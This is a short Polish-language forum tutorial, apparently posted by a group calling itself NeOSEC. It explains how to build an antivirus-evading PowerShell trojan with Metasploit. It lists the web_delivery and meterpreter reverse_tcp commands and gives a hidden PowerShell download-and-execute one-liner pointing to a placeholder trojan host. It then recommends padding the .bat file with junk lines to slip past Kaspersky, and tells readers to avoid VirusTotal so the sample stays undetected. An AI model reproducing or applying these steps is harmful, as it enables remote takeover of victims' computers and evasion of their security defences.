Witam to mj pierwszy poradnik chciabym przedstawi wam mj pomys jak wykorzysta metasploita niewykrywalnego przez AV chodzi o Powershella
instrukcja tworzymy najpierw specjalny kod przez metasploita ktra wykorzystuje Powershella.
1. msfconsole
2. use exploit/multi/script/web_delivery
3. set LPORT
4. set LHOST
5. set target 2
6. set uripath /
7. set PAYLOAD windows/meterpreter/reverse_tcp
8. exploit
gdy mamy stworzony kod mona go uruchomi na .bat (cmd) kod powinien wyglda tak : powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://nasztrojan:8080/'))
niestety jest wykrywalny na niektrych antyvirusach np bodaje na (kaspersky) wystarczy do pliku z kodem .bat dopisa co np [email protected]#%^&*()(*WEQ1123456789876321349765432
a dojdziemy do np 200 linii takich bzdur wpisujemy swj kod Powershella i wszystko jest w porzdku.
Sorki e ten post jest nie za adny i jasno objaniony ale dla pocztkujcych moliwe e pomoe aby si pobawi na komputerach z Antyvirusami macie jakie uwagi piszcie Pozdrawiam.
Grupa NeOSEC.
(Uwaga prosz nie przesya na VirusTotal bo niestety on zbiera raporty i bad te pliki wic taki trojan staje si bardziej wykrywalny.)!!!!!!!!!